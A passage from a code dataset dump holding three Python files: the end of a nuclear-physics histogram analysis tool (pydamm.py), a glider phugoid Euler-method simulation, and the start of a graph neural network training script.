math.sqrt(abs(d))\n return errors\n\n\n def _add_errors(self, error1, error2):\n \"\"\"Add two error arrays\n \\sigma = \\sqrt{\\sigma_1^2 + \\sigma_2^2}\n\n \"\"\"\n if error1.shape != error2.shape:\n raise GeneralError('Shape of array mismatches')\n errors = np.zeros(error1.shape)\n for index, d in np.ndenumerate(error1):\n errors[index] = math.sqrt(error1[index]**2 + error2[index]**2)\n return errors\n\n\n def gx(self, his, gate_x, gate_y=None, bg_gate=None, norm=1,\n bin_size=1, clear=True, plot=True):\n \"\"\"Make projection on Y axis of 2D histogram with gate\n set on X (gate_x) and possibly on Y (gate_y)\n\n his: is a histogram id in a file\n gate_x: is range of bins in (x0, x1) format, this selects the\n range of X columns to be projected on Y axis\n gate_y: is a range of bins in (y0, y1) format (optional), this\n truncates the range of the projection along the Y axis\n bg_gate: is a range of bins in (x0, x1) format (optional), this\n selects the background gate that is subtracted from the\n selected gate_x\n norm: normalization factor (see d())\n bin_size: binning factor (see d())\n clear: True by default, clears previous plots\n plot: True by default, if False no plotting is taking place, \n only the plot object is being returned\n \n \"\"\"\n if gate_x is None or len(gate_x) != 2:\n print('Please select gate on X in a (min, max) format')\n return None\n if gate_y is not None and len(gate_y) != 2:\n print('Please select gate on Y in a (min, max) format')\n return None\n\n # If clear flag used, clear the plotting area\n if clear and plot:\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate all plots if clear flag is used\n if clear and plot:\n for p in Experiment.plots:\n p.active = False\n\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n # x for x_axis data\n # y for y_axis data\n # w for weights\n # g for gate (result)\n # bg for background gate\n x = data[1]\n y = data[2]\n w = data[3]\n if gate_y is None:\n gate_y = [0, len(y)-2]\n y = y[gate_y[0]:gate_y[1]+1]\n g = w[gate_x[0]:gate_x[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=0)\n dg = self._standard_errors_array(g)\n if bg_gate is not None:\n if (bg_gate[1] - bg_gate[0]) != (gate_x[1] - gate_x[0]):\n print('#Warning: background and gate of different widths')\n bg = w[bg_gate[0]:bg_gate[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=0)\n g = g - bg\n # Note that since the gate is adding bins, the formula\n # used for standard error is no longer valid\n # This approximation should be good enough though\n dbg = self._standard_errors_array(bg)\n dg = self._add_errors(dg, dbg)\n\n title = '{}:{} gx({},{})'.format(his, self.hisfile.\\\n histograms[his]['title'].strip(),\n gate_x[0], gate_x[1])\n if bg_gate is not None:\n title += ' bg ({}, {})'.format(bg_gate[0], bg_gate[1])\n title = self._replace_latex_chars(title)\n\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = y\n histo.weights = g\n histo.errors = dg\n gate_plot = Plot(histo, 'histogram', True)\n gate_plot.bin_size = bin_size\n gate_plot.norm = norm\n\n if plot:\n Experiment.plots.append(gate_plot)\n ylim = None\n if self.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n self.plotter.plot1d(gate_plot, Experiment.xlim, ylim)\n\n return gate_plot\n\n\n def gy(self, his, gate_y, gate_x=None, bg_gate=None, norm=1,\n bin_size=1, clear=True, plot=True):\n \"\"\"Make projection on X axis of 2D histogram with gate\n set on Y (gate_y) and possibly on X (gate_x)\n \n see gx for more details\n \"\"\"\n if gate_y is None or len(gate_y) != 2:\n print('Please select gate on Y in a (min, max) format')\n return None\n if gate_x is not None and len(gate_x) != 2:\n print('Please select gate on X in a (min, max) format')\n return None\n\n # If clear flag used, clear the plotting area\n if clear and plot:\n self.plotter.clear()\n\n # Switch mode to 1D\n self.mode = 1\n # Deactivate all plots if clear flag is used\n if clear and plot:\n for p in Experiment.plots:\n p.active = False\n\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n # x for x_axis data\n # y for y_axis data\n # w for weights \n # g for gate (result)\n # bg for background gate\n x = data[1]\n y = data[2]\n w = data[3]\n if gate_x is None:\n gate_x = [0, len(x)-2]\n x = x[gate_x[0]:gate_x[1]+1]\n g = w[gate_x[0]:gate_x[1]+1, gate_y[0]:gate_y[1]+1].sum(axis=1)\n dg = self._standard_errors_array(g)\n if bg_gate is not None:\n if (bg_gate[1] - bg_gate[0]) != (gate_y[1] - gate_y[0]):\n print('#Warning: background and gate of different widths')\n\n bg = w[gate_x[0]:gate_x[1]+1, bg_gate[0]:bg_gate[1]+1].sum(axis=1)\n g = g - bg\n # Note that since the gate is adding bins, the formula\n # used for standard error is no longer valid\n # This approximation should be good enough though\n dbg = self._standard_errors_array(bg)\n dg = self._add_errors(dg, dbg)\n\n title = '{}:{} gy({},{})'.format(his, self.hisfile.\\\n histograms[his]['title'].strip(),\n gate_y[0], gate_y[1])\n if bg_gate is not None:\n title += ' bg ({}, {})'.format(bg_gate[0], bg_gate[1])\n title = self._replace_latex_chars(title)\n\n histo = histogram.Histogram()\n histo.title = title\n histo.x_axis = x\n histo.weights = g\n histo.errors = dg\n gate_plot = Plot(histo, 'histogram', True)\n gate_plot.bin_size = bin_size\n gate_plot.norm = norm\n\n Experiment.plots.append(gate_plot)\n if plot:\n ylim = None\n if self.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = self.ylim\n self.plotter.plot1d(gate_plot, Experiment.xlim, ylim)\n\n return gate_plot\n\n\n def mark(self, x_mark):\n \"\"\"Put vertical line on plot to mark the peak (or guide the eye)\"\"\"\n plt.axvline(x_mark, ls='--', c='black')\n\n\n def annotate(self, x, text, shiftx=0, shifty=0):\n \"\"\" Add arrow at x, with annotation text\"\"\"\n if self.mode != 1:\n print('Annotation works only for 1D histograms')\n return None\n\n length = 0.07 * (plt.ylim()[1] - plt.ylim()[0])\n y = self.plots[-1].histogram.weights[x // self.plots[-1].bin_size]\n plt.annotate(text, xy=(x, y),\n xytext=(x + shiftx, y + length + shifty),\n rotation=90.,\n xycoords='data',\n fontsize=9,\n verticalalignment='bottom',\n horizontalalignment='center',\n arrowprops=dict(width=1, facecolor='black', headwidth=5,\n shrink=0.1))\n\n\n def load_gates(self, filename):\n \"\"\"Load gamma gates from text file, the format is:\n # Comment line\n Name x0 x1 bg0 bg1\n Example:\n 110 111 113 115 117\n\n \"\"\"\n gatefile = open(filename, 'r')\n lineN = 0\n gates = {}\n for line in gatefile:\n lineN += 1\n line = line.strip()\n if line.startswith('#'):\n continue\n items = line.split()\n if len(items) < 5:\n print('Warning: line {} bad data'.format(lineN))\n continue\n gates[int(items[0])] = ((int(items[1]), int(items[2])),\n (int(items[3]), int(items[4])))\n return gates\n\n\n def pk(self, *args, **kwargs):\n \"\"\"Add peaks for gaussian fitting procedure. The args\n give a list of peak energy (approx.), the kwargs may include\n additional parameters (e.g. min or max, etc) used by peak_fitter\"\"\"\n for e in args:\n if isinstance(e, int) or isinstance(e, float):\n p = {'E' : e}\n p.update(kwargs)\n self.peaks.append(p)\n\n\n def pzot(self):\n \"\"\"Clear all peaks \"\"\"\n self.peaks=[]\n\n\n def dd(self, his, xc=None, yc=None, logz=None):\n \"\"\"Plot 2D histogram,\n\n his may be a positive integer (loads histogram from the data file)\n negative integer (2D plots registry) or Plot instance (must be a 2D\n plot)\n\n xc is x range, yc is y range, that may be applied immediately, \n see also xc() and yc() functions\n\n \"\"\"\n self.mode = 2\n\n for p in Experiment.maps:\n p.active = False\n\n plot = None\n self.plotter.clear()\n\n if isinstance(his, int):\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 2:\n print('{} is not a 2D histogram'.format(his))\n return None\n\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, \n self._replace_latex_chars(title))\n histo = histogram.Histogram(dim=2)\n histo.title = title\n histo.x_axis = data[1]\n histo.y_axis = data[2]\n histo.weights = data[3]\n plot = Plot(histo, 'map', True)\n Experiment.maps.append(plot)\n else:\n # plot histogram from the registry\n # Numbered by negative numbers (-1 being the latest)\n # Call show_registers for a list of available plots\n try:\n plot = Experiment.maps[his]\n Experiment.maps[his].active = True\n except IndexError:\n print('There is no 2D plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n elif isinstance(his, Plot):\n # If instance of Plot class is given, mark it active and add\n # to the deque (if not already there)\n # and to the array to be returned at the end\n if his.histogram.dim != 2:\n print('This {} is not a 2D histogram'.format(his))\n return None\n his.active = True\n plot = his\n if his not in Experiment.maps:\n Experiment.maps.append(his)\n\n if xc is not None:\n Experiment.xlim2d = xc\n if yc is not None:\n Experiment.ylim2d = yc\n\n if logz is None:\n use_log = Experiment.logz\n else:\n use_log = logz\n if plot is not None:\n self.plotter.plot2d(plot, Experiment.xlim2d, \n Experiment.ylim2d, use_log)\n\n return [plot]\n\n\n def xc(self, x0=None, x1=None):\n \"\"\"Change xrange of a 2D histograms\"\"\"\n if self.mode == 2:\n if x0 is None or x1 is None:\n Experiment.xlim2d = None\n xlim = None\n for p in Experiment.maps:\n if p.active:\n histo = p.histogram\n xlim = (histo.x_axis[0], histo.x_axis[-1])\n break\n else:\n Experiment.xlim2d = (x0, x1)\n xlim = (x0, x1)\n self.dd(-1, xc=xlim, yc=Experiment.ylim2d)\n\n\n def yc(self, y0=None, y1=None):\n \"\"\"Change yrange of a 2D histogram\"\"\"\n if self.mode == 2:\n if y0 is None or y1 is None:\n Experiment.ylim2d = None\n ylim = None\n for p in Experiment.maps:\n if p.active:\n histo = p.histogram\n ylim = (histo.y_axis[0], histo.y_axis[-1])\n break\n else:\n Experiment.ylim2d = (y0, y1)\n ylim = (y0, y1)\n self.dd(-1, xc=Experiment.xlim2d, yc=ylim)\n\n\n\n def clear(self):\n self.plotter.clear()\n\n\n def color_map(self, cmap=None, clist=False):\n if self.mode == 2:\n self.plotter.color_map(cmap)\n self.dd(-1, xc=Experiment.xlim2d, yc=Experiment.ylim2d)\n if clist:\n maps=[m for m in cm.datad if not m.endswith(\"_r\")]\n print(maps)\n \n \n\n def fit_peaks(self, his=None, rx=None, clear=True):\n \"\"\"\n Fit gaussian peaks to 1D plot. If his is not given the\n current plot is used. If rx is not given, the current range is used\n Returns list of lists:\n [E, x0, dx, A, dA, s, Area]\n where E is name of the peak, x0, A and s are fitted parameters\n and d'something' is its uncertainity. Area is total calculated area.\n\n \"\"\"\n if rx is None:\n rx = Experiment.xlim\n if len(rx) != 2:\n print('Please use x range in format rx=(min, max), where',\n 'min and max are integers.')\n return None\n\n # Deactivate all the plots\n for p in Experiment.plots:\n if p.active:\n p.active = False\n\n peaks = []\n for p in self.peaks:\n if rx[0] <= p.get('E') <= rx[1]:\n peaks.append(p)\n\n PF = PeakFitter(peaks, 'linear', '')\n\n\n if his is not None:\n if hasattr(his,'histogram'):\n x_axis = his.histogram.x_axis\n weights = his.histogram.weights\n title = his.histogram.title\n if isinstance(his, int):\n if his > 0:\n data = self.hisfile.load_histogram(his)\n if data[0] != 1:\n print('{} is not a 1D histogram'.format(his))\n return None\n x_axis = data[1]\n weights = data[3]\n title = self.hisfile.histograms[his]['title'].strip()\n title = '{}:{}'.format(his, self._replace_latex_chars(title))\n else:\n try:\n x_axis = Experiment.plots[his].histogram.x_axis\n weights = Experiment.plots[his].histogram.weights\n title = Experiment.plots[his].histogram.title\n except IndexError:\n x_axis=0\n weights=0\n title='Err'\n print('There is no plot in the registry under the',\n 'number', his, 'use show_registry() to see',\n 'available plots')\n return None\n else:\n x_axis = Experiment.plots[-1].histogram.x_axis\n weights = Experiment.plots[-1].histogram.weights\n title = Experiment.plots[-1].histogram.title\n \n dweights = self._standard_errors_array(weights)\n \n if clear:\n self.clear()\n\n histo_data = histogram.Histogram()\n histo_data.x_axis = x_axis\n histo_data.weights = weights\n histo_data.errors = dweights\n histo_data.title = title\n plot_data = Plot(histo_data, 'histogram', True)\n # The histogram data is plotted here so the fit function\n # may be overlaid on in. However, the plot_data is appended \n # to the registry after the fit functions so it is on top of the\n # registry.\n self.plotter.plot1d(plot_data, xlim=rx)\n\n fit_result = PF.fit(x_axis[rx[0]:rx[1]], weights[rx[0]:rx[1]],\n dweights[rx[0]:rx[1]])\n\n histo_baseline = histogram.Histogram()\n histo_baseline.x_axis = x_axis[rx[0]:rx[1]]\n histo_baseline.weights = fit_result['baseline']\n histo_baseline.title = 'Baseline'\n plot_baseline = Plot(histo_baseline, 'function', True)\n self.plotter.plot1d(plot_baseline, xlim=rx)\n\n histo_peaks = histogram.Histogram()\n histo_peaks.x_axis = fit_result['x_axis']\n histo_peaks.weights = fit_result['fit']\n histo_peaks.title = 'Fit'\n plot_peaks = Plot(histo_peaks, 'function', True)\n\n # Append all the plots to the registry, but\n # keep original data at the end, so the next fit_peaks()\n # call will use then again as default\n Experiment.plots.append(plot_baseline)\n Experiment.plots.append(plot_peaks)\n Experiment.plots.append(plot_data)\n\n # Plot the last one with the auto_scale if needed\n if Experiment.ylim is None:\n ylim = self._auto_scale_y()\n else:\n ylim = Experiment.ylim\n\n self.plotter.plot1d(plot_peaks, xlim=rx, ylim=ylim)\n\n\n\n print('#{:^8} {:^8} {:^8} {:^8} {:^8} {:^8} {:^8}'\n .format('Peak', 'x0', 'dx', 'A', 'dA', 's', 'Area'))\n peak_data = []\n for i, peak in enumerate(peaks):\n if peak.get('ignore') == 'True':\n continue\n x0 = PF.params['x{}'.format(i)].value\n dx = PF.params['x{}'.format(i)].stderr\n A = PF.params['A{}'.format(i)].value\n dA = PF.params['A{}'.format(i)].stderr\n s = PF.params['s{}'.format(i)].value\n Area = PF.find_area(x_axis, i)\n #.format functions differently for 3.4+. Now uses the object.__format__\n #if something doesn't have its own __format__. Avoided by making string w/ !s\n #had to remove '.(x)f' from all but first placeholder where (x)=decimal places\n #dvm 2018-05-09\n # to achieve the decimal formatting, currently using round(). Needs revisited\n # to evaluate accuracy of doing this to floats.\n print('{!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8} {!s:>8}'\n .format(peaks[i].get('E'), round(x0,2), round(dx,2), round(A,2)\n , round(dA,2), round(s,2), round(Area,2)))\n peak_data.append([peaks[i].get('E'), x0, dx, A, dA, s, Area])\n return peak_data\n\n\n def fit_decay(self, his, gate, cycle, \n t_bin=1, time_range=None,\n model='grow_decay',\n pars=None,\n clear=True):\n \"\"\"Fits decay time profile (grow-in/decay cycle):\n * his: is E-time histogram id\n * gate: should be given in format:\n ((x0, x1), (bg0, bg1))\n * cycle: is list of beam start, beam stop, cycle end, e.g.\n (0, 100, 300)\n * t_bin: is a binning parameter (optional)\n * time_range: is a gate in time in (t0, t1) format (optional)\n * model: is a model used for fit (see decay_fitter)\n (default is 'grow_decay')\n * pars is a list of dictionaries (one dict per each parameter)\n (optional, use if model is different than the default one, see\n decay_fitter for details)\n \n \"\"\"\n if pars is None:\n T0 = {'name' : 'T0', 'value' : cycle[0], 'vary' : False}\n T1 = {'name' : 'T1', 'value' : cycle[1], 'vary' : False}\n T2 = {'name' : 'T2', 'value' : cycle[2], 'vary' : False}\n P1 = {'name' : 'P1', 'value' : 100.0}\n t1 = {'name' : 't1', 'value' : 100.0}\n parameters = [T0, T1, T2, P1, t1]\n if model == 'grow_decay2':\n P2 = {'name' : 'P2', 'value' : 1000.0}\n t2 = {'name' : 't2', 'value' : 1000.0}\n parameters.append(P2)\n parameters.append(t2)\n else:\n parameters = pars\n\n df = DecayFitter()\n\n xgate = self.gx(his, gate_x=gate[0], gate_y=time_range, bin_size=t_bin,\n plot=False)\n bckg = self.gx(his, gate_x=gate[1], gate_y=time_range, bin_size=t_bin,\n plot=False)\n\n dyg = self._standard_errors_array(xgate.histogram.weights)\n dyb = self._standard_errors_array(bckg.histogram.weights)\n\n gate_histo = histogram.Histogram()\n gate_histo.x_axis = xgate.histogram.x_axis\n gate_histo.weights = xgate.histogram.weights - bckg.histogram.weights\n gate_histo.errors = np.sqrt(dyg**2 + dyb**2)\n gate_histo.title = '{}: gx {} bg {} bin {}'.\\\n format(his, gate[0], gate[1], t_bin)\n plot_data = Plot(gate_histo, 'errorbar', True)\n\n t, n, parameters = df.fit(gate_histo.x_axis, gate_histo.weights,\n gate_histo.errors, model, parameters)\n\n fit_histo = histogram.Histogram()\n fit_histo.x_axis = t\n fit_histo.weights = n\n fit_histo.title = self._replace_latex_chars('Fit: {}'.format(model))\n plot_fit = Plot(fit_histo, 'function', True)\n\n if clear:\n self.clear()\n\n self.plotter.plot1d(plot_fit, [cycle[0], cycle[2]], None)\n self.plotter.plot1d(plot_data, [cycle[0], cycle[2]], None)\n\n Experiment.plots.append(plot_fit)\n Experiment.plots.append(plot_data)\n\n return parameters\n\n\n def gamma_gamma_spectra(self, gg_id, gate, bin_size=1):\n \"\"\" \n Plots gamma-gamma gate broken into 4 subplots (0-600, 600-1200,\n 1200-2000, 2000-4000. \n gg_id is a 2D histogram id\n gate is in form ((x1, y1), (x2, y2)) where i=1 is gate on line, i=2\n is gate on background\n\n This special plot is not loaded into the registry in a 4 panel\n form, but as a 'standard' plot object\n \"\"\"\n self.clear()\n plot = self.gy(gg_id, gate[0], bg_gate=gate[1], \n bin_size=bin_size, plot=False )\n ranges = (0, 600, 1200, 2000, 4000)\n self.plotter.plot1d_4panel(plot, ranges)\n\n def st(self,numx,numy,args):\n \"\"\"\n This command is similar but different to the \"st\" or stack\n command in damm. Create an array of subplots numx by numy.\n Then disply a multiplot array of list *args). This should work for \n 1 and 2d histograms but ought to be cleaned up.\n \"\"\"\n\n self.clear()\n for i in range(numx):\n for j in range(numy):\n if len(args)!=numx*numy: \n print('range mismatch')\n break\n n = i+numx*(j-1) if numy!=1 else j+numy*(i-1) \n ax = plt.subplot(numx,numy,n)\n ax.set_xlim([args[n].histogram.weights.nonzero()[0][0]-2,args[n].histogram.weights.nonzero()[0][-1]+10])\n ax.set_ylim([0,args[n].histogram.weights.max()*1.66])\n if args[n].histogram.dim==1: \n ax.plot(args[n].histogram.weights,ls='steps-mid',label=args[n].histogram.title)\n ax.legend()\n else:\n self.plotter.plot2d(args[n])\n plt.tight_layout()\n\n\n def rebin(self,hisd):\n \"\"\"\n Rebin the last 1 or 2d histogram as specified by hisd. Can be used after a \"zoom\" or \"pan\" in the canvas. TBD automated rebinning for faster displaying.\n \"\"\"\n tup = (plt.xlim(),plt.ylim())\n if hisd==1:\n temp=self.plots[-1]\n tup=self.fence(temp,tup,hisd)\n self.dl(tup[0][0],tup[0][1])\n else:\n temp=self.maps[-1]\n tup=self.fence(temp,tup,hisd)\n self.dd(-1,xc=tup[0],yc=tup[1])\n\n\n def fence(self,args,tup,hisd):\n \"\"\"\n Confine plot regions to the bounds of the data in the histogram.\n \"\"\"\n x0 = tup[0][0]\n x1 = tup[0][1]\n y0 = tup[1][0]\n y1 = tup[1][1]\n if x0 <= args.histogram.x_axis[0]:\n x0 = args.histogram.x_axis[0]\n if x1 >= args.histogram.x_axis[-1]:\n x1 = args.histogram.x_axis[-1]\n if y0 <= 0:\n y0 = 0\n if hisd==1:\n if y1 >= args.histogram.weights.max():\n y1 = args.histogram.weights.max()*1.33\n else:\n if y1 >= args.histogram.y_axis[-1]:\n y1 = args.histogram.y_axis[-1]\n return ((x0,x1),(y0,y1)) \n\n def trace_explorer(self,his,start=0,finish=None):\n \"\"\"\n Adds the ability to examine a 2D trace histogram or range of 1D histograms \n and use sliders to visualize the effect of a given trapezoidal filter on the traces.\n This is most helpful when setting up a new detector or signal type. \n \"\"\"\n\n import matplotlib.patches as mpt\n from matplotlib.widgets import Slider, Button, RadioButtons\n\n fig = plt.figure()\n\n def trap_filter(times,res,L,G):\n \"\"\"\n Returns the trapezoidal filtered version of the input vector, res according to \n L (length) and G (gap) of the resultant trapezoid.\n \"\"\"\n retvec = np.zeros(len(times))\n zidx = times.searchsorted(0)\n for i in range( zidx,len(times) ):\n retvec[i]=(res[i-L+1:i]-res[i-2*L-G+1:i-L-G]).sum()\n return(retvec)\n\n def tau_adjust(pulse,tau):\n \"\"\"\n Returns the Tau/Pole-Zero corrected version of the input vector, pulse according to tau.\n \"\"\"\n from copy import deepcopy as cp\n\n bls = cp(pulse)\n retvec = cp(pulse)\n bls -= pulse[:100].mean()\n for t in range(3,len(pulse)):\n pz = bls[:t-1].sum()\n retvec[t] += bls[t] + pz/tau \n return(retvec)\n\n def zero_crossing(trap):\n \"\"\"\n Returns the CFD version of the input vector, trap.\n \"\"\"\n from copy import deepcopy as cp\n\n delay = cp(trap)\n td = 20 #time delay \n cf = .8 #constant fraction\n delay[:-td] += -cf*trap[td:] \n return(delay)\n\n def update_te(val):\n slen.val = int(slen.val)\n length = slen.val\n slen.valtext.set_text(length)\n sgap.val = int(sgap.val)\n gap = sgap.val\n sgap.valtext.set_text(gap)\n sid.val = int(sid.val)\n trace_id = sid.val\n sid.valtext.set_text(trace_id)\n tau = 10**stau.val\n stau.valtext.set_text(tau)\n \n pulse[pulse_len:] =weights[:,trace_id][:pulse_len]\n pulse[:pulse_len] =weights[:,trace_id][2]\n pz = tau_adjust(pulse, tau)\n ff = trap_filter(t,pz,length,gap)\n zc = zero_crossing(ff)\n l.set_ydata( pulse )\n l2.set_ydata( pz )\n l3.set_ydata( ff )\n l4.set_ydata( zc )\n ax1.set_ylim(pulse.min()-margin,pulse.max()+margin)\n ax2.set_ylim(pz.min()-margin,pz.max()+margin)\n ax3.set_ylim(ff.min()-margin,ff.max()+margin)\n ax4.set_ylim(zc.min()-margin,zc.max()+margin)\n fig.canvas.draw_idle()\n \n #starting positions for sliders\n l0=100\n g0=200\n tau=1\n \n histo = self.hisfile.load_histogram(his)\n weights = histo[3]\n dim = histo[0]\n\n if finish==None and dim == 2:\n finish = weights[10].nonzero()[0][-1]\n elif finish==None:\n finish = start + 1 \n\n if dim == 2:\n pulse_histo = weights[:,start]\n else:\n pulse_histo = weights \n pulse_len = pulse_histo.nonzero()[0][-1]+1\n\n pulse = np.zeros(2*pulse_len)\n pulse[pulse_len:] += pulse_histo[:pulse_len]\n pulse[:pulse_len] += pulse_histo[2]\n t = np.arange(-pulse_len,pulse_len,1) \n\n ax1 = plt.subplot(3,2,1)\n ax2 = plt.subplot(3,2,2,sharex=ax1)\n ax3 = plt.subplot(3,2,3,sharex=ax1)\n ax4 = plt.subplot(3,2,4,sharex=ax1)\n margin = 100\n \n pz = tau_adjust(pulse,tau)\n ff = trap_filter(t,pz,l0,g0)\n zc = zero_crossing(ff)\n \n l,= ax1.plot(t,pulse,lw=2,color='red')\n ax1.legend(['Input Pulse'])\n l2,= ax2.plot(t,pz,lw=2,color='k')\n ax2.legend(['Pole-zero/Tau Corrected'])\n l3,= ax3.plot(t,ff,lw=2,color='blue')\n ax3.legend(['Trapezoidal Filter Output'])\n l4,= ax4.plot(t,zc,lw=2,color='green')\n ax4.legend(['CFD Output'])\n \n ax2.set_xlim(0,pulse_len)\n ax1.set_ylim(pulse.min()-margin,pulse.max()+margin)\n ax2.set_ylim(pz.min()-margin*10,pz.max()+margin*10)\n ax3.set_ylim(ff.min()-margin*10,ff.max()+margin*10)\n ax4.set_ylim(zc.min()-margin*10,zc.max()+margin*10)\n \n axlen = plt.axes([0.15,0.17, 0.65, 0.03])\n axgap = plt.axes([0.15,0.21, 0.65, 0.03])\n axid = plt.axes([0.15,0.13, 0.65, 0.03])\n axtau = plt.axes([0.15,0.09, 0.65, 0.03])\n slen = Slider(axlen, 'Length', 1, 1000.0, valinit=l0)\n sgap = Slider(axgap, 'Gap', 1, 1000.0, valinit=g0)\n sid = Slider(axid, 'Trace id', start, finish, valinit=start)\n stau = Slider(axtau, 'Tau', -1, 4, valinit=tau)\n\n\n slen.on_changed(update_te)\n sgap.on_changed(update_te)\n sid.on_changed(update_te)\n stau.on_changed(update_te)\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"pydamm.py","file_name":"pydamm.py","file_ext":"py","file_size_in_byte":52655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"549160373","text":"import numpy as np\nfrom math import sin, cos, log, ceil\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams #Allows us to set notebook wide plotting parameters\n\nrcParams['font.family'] = 'serif'\nrcParams['font.size'] = 16\n\n \n#Impliments a single step in the Euler method: u(t + dt) = u(t) + dt*u_prime(u(t)) \ndef Euler_Step (u, u_prime, dt):\n \n return u + dt*u_prime(u)\n \n#Computes the difference between two solutions, one on the current grid and the other\n#on a finer grid\n\ndef get_griddiff(u_current,u_fine,dt):\n space_current = len(u_current[:,0])\n space_fine = len(u_fine[:,0])\n \n grid_ratio = ceil(space_fine/float(space_current))\n \n diffgridx = dt*np.sum(np.abs(u_current[:,2] - u_fine[::grid_ratio,2]))\n diffgridy = dt*np.sum(np.abs(u_current[:,3] - u_fine[::grid_ratio,3]))\n \n return max(diffgridx,diffgridx)\n\n\n#Define the parameters for the model\ng = 9.81 #acceleration due to gravity\nv_t = 60. #trim velocity \nC_D = 1/40. #Drag coefficeint --- or D/L if C_L = 1.0\nC_L = 1 #For convenience we put C_L = 1 \n\n\n#Initial Conditions\nv0 = v_t #Start at the trim velocity\ntheta0 = 0.0 #Initially horizonatl\nx0 = 0.0 #Horizontal position -- arbitrary\ny0 = 1000.0 #Initial altitude\n\n\n#Define u_prime for this model\ndef f_phugoid(u):\n #u is a four array u= (v,theta,x,y)\n \n v = u[0]\n theta = u[1]\n x = u[2]\n y=u[3]\n \n return np.array([-g*sin(theta) - C_D/C_L*g/v_t**2*v**2, -g/v*cos(theta)\n +g/v_t**2*v, v*cos(theta), v*sin(theta)])\n \n\n\n#Choose the flight time\nT = 100.\n\n#We would like to test this model for several values of the time step dt\n\n#dt_values = np.array([0.1,0.05,0.01,0.005,0.001])\ndt_values = np.array(range(0,6))*0.2*np.pi\ndt = 0.01\n#Will hold the solutions one for each value of dt\nu_values = np.empty_like(dt_values, dtype = np.ndarray)\n\n#Perform Eulers method for each dt\n\nfor i,vin in enumerate(dt_values):\n \n N = int(T/dt) + 1 #Number of time steps\n \n #Initilize array to hold the soltuion and then put first element equal to the initial conditions\n u = np.empty((N,4))\n u[0] = np.array([v0,vin,x0,y0])\n \n #Run Eulers method\n for j in range (N-1):\n u[j+1] = Euler_Step(u[j],f_phugoid,dt)\n \n #Store solution is u_vales\n u_values[i] = u \n'''\n#Make an array of grid differences\ngriddiff = np.empty_like(dt_values)\n\nfor i, dt in enumerate(dt_values):\n \n print ('dt = {}'.format(dt))\n #Find grid differences between a given grid and the finest one we computed\n \n griddiff[i] = get_griddiff(u_values[i],u_values[-1],dt)\n\n'''\n#We are now ready to plot the trajectories\n\nplt.figure(figsize=(8,6))\nplt.grid(True)\nplt.xlabel(r'x',fontsize = 18)\nplt.ylabel(r'y', fontsize = 18)\nplt.title('Glider Trajectory: Flight Time = %.2f'% T, fontsize =18)\n\nfor i in range(len(dt_values)):\n plt.plot(u_values[i][:,2],u_values[i][:,3], lw = 2, label = '%.2f'%dt_values[i])\nplt.legend()\n'''\n#Plot the grid differences on log-log scale\nplt.figure(figsize = (6,6))\nplt.grid(True)\nplt.xlabel(r'$\\Delta t$',fontsize = 18)\nplt.ylabel(r'$L_1$--norm of grid difference', fontsize = 18)\nplt.axis('equal')\nplt.loglog(dt_values[:-1],griddiff[:-1],color ='r', ls = '-', lw=2,marker = 'o')\n\n'''\nplt.show()\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lessons/01_phugoid/My Files/Phugoid_Oscillation.py","file_name":"Phugoid_Oscillation.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"91816905","text":"from torch.autograd import Variable\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.decomposition import PCA\n\ntorch.manual_seed(123)\nfrom dgl.data import CoraDataset, CitationGraphDataset, PPIDataset, KarateClub\nimport dgl\nfrom scipy import sparse\nimport numpy as np\nnp.random.seed(123)\nimport time\nimport networkx as nx\nfrom .pytorch_U2GNN_UnSup import TransformerU2GNN\nfrom .gat_pytorch import TransformerGAT\nfrom .gcn_pytorch import TransformerGCN\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nfrom .metrics import print_evaluation_from_embeddings\nfrom scipy.sparse import coo_matrix\nfrom .data_utils import generate_synthetic_dataset, get_vicker_chan_dataset, get_congress_dataset, get_mammo_dataset, get_balance_dataset, get_leskovec_dataset, get_leskovec_true_dataset, sgwt_raw_laplacian, load_ml_clustering_mat_dataset, load_ml_clustering_scipymat_dataset, get_uci_true_dataset\nfrom .util import load_data, separate_data_idx, Namespace ,make_symmetric\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import kneighbors_graph\nimport statistics\nfrom .python_multi_layer_siamese_u2gnn import TransformerMLU2GNN\n\ndef process_adj_mat(adj,args):\n \n pos_weight = float(adj.shape[0] * adj.shape[1] * adj.shape[2] - adj.sum()) / adj.sum()\n norm = adj.shape[0] * adj.shape[1] * adj.shape[2] / float((adj.shape[0] * adj.shape[1] * adj.shape[2] - adj.sum()) * 2)\n adj_label = adj.copy()\n #adj_label = Variable(torch.from_numpy(adj_label).float().to(args.device))\n adj_label = torch.from_numpy(adj_label).float().to(args.device)\n #adj_norm = Variable(torch.from_numpy(nx.normalized_laplacian_matrix(args.graph_obj).todense()).float().to(args.device))\n adj_norm = Variable(torch.from_numpy(adj.copy()).float().to(args.device))\n args.update(adj_norm = adj_norm)\n weight_mask = adj_label.view(-1) == 1\n weight_tensor = torch.ones(weight_mask.size(0)).to(args.device)\n weight_tensor[weight_mask] = pos_weight\n args.update(adj_label = adj_label)\n args.update(norm = torch.tensor(norm))\n 